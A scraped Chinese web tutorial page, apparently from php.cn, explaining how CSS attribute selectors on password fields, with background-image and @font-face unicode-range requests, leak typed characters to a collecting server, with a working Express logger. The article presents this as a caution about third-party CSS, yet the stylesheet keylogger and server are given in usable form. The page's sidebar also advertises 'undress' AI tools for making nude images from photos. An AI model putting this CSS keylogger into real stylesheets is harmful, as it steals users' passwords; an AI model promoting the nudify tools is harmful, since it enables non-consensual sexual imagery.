cari
Rumahhujung hadapan webtutorial cssCSS记录用户密码实现代码分享

本文主要和大家介绍了CSS 记录用户密码的方法的相关资料,简单的CSS代码,甚至不符合图灵完备的语言,但是也能成为一些攻击者的工具,下面简单介绍一下如何使用CSS去记录用户的密码。但是这些CSS脚本会出现在第三方CSS库中,所以使用第三方CSS库也需要谨慎,确保代码安全。直接上代码解析:


input[type="password"][value$="0"] { 
    background-image: url("http://localhost:3000/0"); 
}
input[type="password"][value$="1"] { 
    background-image: url("http://localhost:3000/1"); 
}
input[type="password"][value$="2"] { 
    background-image: url("http://localhost:3000/2"); 
}

以上是部分代码,我们来解析一下CSS代码

input[type="password"]是css选择器,作用是选择密码输入框, [value$="0"]表示匹配输入的值是以0结尾的。所以:


input[type="password"][value$="0"] { 
    background-image: url("http://localhost:3000/0"); 
}

上面代码的意思就是如果你在密码框中输入0,就去请求http://localhost:3000/0接口,但是浏览器默认情况下是不会将用户输入的值存储在value属性中,但是有的框架会同步这些值,例如React。

所以只要使用了如下图的脚本就能去存储用户的输入数据信息。

我们再来看一下服务器端的代码:


const express = require("express");
const app = express();

app.get("/:key", (req, res) => {
   process.stdout.write(req.params.key);
   return res.sendStatus(400);
});

app.listen(3000, () => console.log("启动,监听3000端口"));

使用express创建服务器,监听3000端口,只要请求http://localhost:3000/:key,就能输出key的值,就能在服务器上记录输入的值。所以只要在每输入一个值都匹配,然后通过 background-image 去请求一个已经准备好的接口,就能记录用户的输入。类似的方法记录用户的内容的CSS代码@font-face {  


   font-family: blah;  
   src: url('http://localhost:3000/a') format('woff');  
   unicode-range: U+85;
}
html {  
   font-family: blah, sans-serif;
}

你使用的的css的简单的字体库,只要你的页面中包含a,就会去请求http://localhost:3000/a,这样就能知道你的页面中包含有a字符。

相关推荐:

PHP实现保存网站用户密码到css文件分享

怎样去存储用户密码安全

php用户密码加密算法解析

Atas ialah kandungan terperinci CSS记录用户密码实现代码分享. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Animasi dengan laluan klipAnimasi dengan laluan klipApr 19, 2025 am 09:52 AM

Jalan klip adalah salah satu daripada sifat-sifat CSS yang biasanya kita ketahui ada di sana tetapi mungkin tidak dapat dicapai untuk apa jua sebab. Ia agak menakutkan dalam erti kata

Menggunakan Taman Permainan Graphql dengan GatsbyMenggunakan Taman Permainan Graphql dengan GatsbyApr 19, 2025 am 09:51 AM

Saya mengandaikan kebanyakan anda telah mendengar tentang Gatsby, dan sekurang -kurangnya longgar tahu bahawa ia pada dasarnya merupakan penjana tapak statik untuk tapak React. Secara amnya

Jenis atau ujian: Mengapa tidak kedua -duanya?Jenis atau ujian: Mengapa tidak kedua -duanya?Apr 19, 2025 am 09:50 AM

Setiap sekarang dan kemudian, perdebatan menyala tentang nilai JavaScript yang ditaip. "Hanya tulis lebih banyak ujian!" menjerit beberapa lawan. "Gantikan ujian unit dengan jenis!"

Antara muka pengguna grafik untuk gitAntara muka pengguna grafik untuk gitApr 19, 2025 am 09:46 AM

Lemme mengulangi apa yang kelihatan seperti pemain utama untuk GIT GUI hari ini.

Petua untuk melancarkan pemuatan malas anda sendiriPetua untuk melancarkan pemuatan malas anda sendiriApr 19, 2025 am 09:44 AM

Anda mungkin pernah mendengar (atau mengeluarkan panggilan) bahawa "Kami hanya boleh menggunakan pemuatan malas!" Apabila mencari jalan untuk merendahkan laman web yang sangat berat.

Tiga ramalan dari Kajian Negeri CSS 2019Tiga ramalan dari Kajian Negeri CSS 2019Apr 19, 2025 am 09:43 AM

Menjalankan kaji selidik pemaju seperti keadaan CSS adalah proses pelbagai peringkat. Pertama, anda perlu mengumpul data. Kemudian, anda memprosesnya ke dalam bentuk yang boleh digunakan.

Akhirnya ... jawatan pada akhirnya dalam janjiAkhirnya ... jawatan pada akhirnya dalam janjiApr 19, 2025 am 09:39 AM

"Bilakah akhirnya api dalam janji JavaScript?" Ini adalah soalan yang saya tanya dalam bengkel baru -baru ini dan saya fikir saya akan menulis sedikit jawatan untuk membersihkan apa -apa

See all articles

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

AI Hentai Generator

AI Hentai Generator

Menjana ai hentai secara percuma.

Alat panas

mPDF

mPDF

mPDF ialah perpustakaan PHP yang boleh menjana fail PDF daripada HTML yang dikodkan UTF-8. Pengarang asal, Ian Back, menulis mPDF untuk mengeluarkan fail PDF "dengan cepat" dari tapak webnya dan mengendalikan bahasa yang berbeza. Ia lebih perlahan dan menghasilkan fail yang lebih besar apabila menggunakan fon Unicode daripada skrip asal seperti HTML2FPDF, tetapi menyokong gaya CSS dsb. dan mempunyai banyak peningkatan. Menyokong hampir semua bahasa, termasuk RTL (Arab dan Ibrani) dan CJK (Cina, Jepun dan Korea). Menyokong elemen peringkat blok bersarang (seperti P, DIV),

SublimeText3 versi Inggeris

SublimeText3 versi Inggeris

Disyorkan: Versi Win, menyokong gesaan kod!

SublimeText3 versi Cina

SublimeText3 versi Cina

Versi Cina, sangat mudah digunakan

Dreamweaver Mac版

Dreamweaver Mac版

Alat pembangunan web visual

VSCode Windows 64-bit Muat Turun

VSCode Windows 64-bit Muat Turun

Editor IDE percuma dan berkuasa yang dilancarkan oleh Microsoft